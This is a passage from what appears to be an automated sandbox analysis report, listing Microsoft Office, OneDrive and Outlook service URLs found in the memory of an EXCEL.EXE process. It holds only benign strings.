      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://ncus.contentsync.
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
      Source: EXCEL.EXE, 00000000.00000003.536474364.000000000F4F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.432672705.000000000F449000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com?&
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordRV~
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com0
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com6
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com8
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comJ
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comM
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comN
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comX
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comZ
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comd
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comf
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comi
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coml
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comr
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coms.dll
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comx
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://onedrive.live.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?iao
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://osi.office.net
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netX
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netj
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://outlook.office.com
      Source: EXCEL.EXE, 00000000.00000003.536668437.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629731941.0000000012E0B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://outlook.office.com/
      Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://outlook.office365.com
      Source: EXCEL.EXE, 00000000.00000003.536668437.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629731941.0000000012E0B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://outlook.office365.com/
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/3m
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
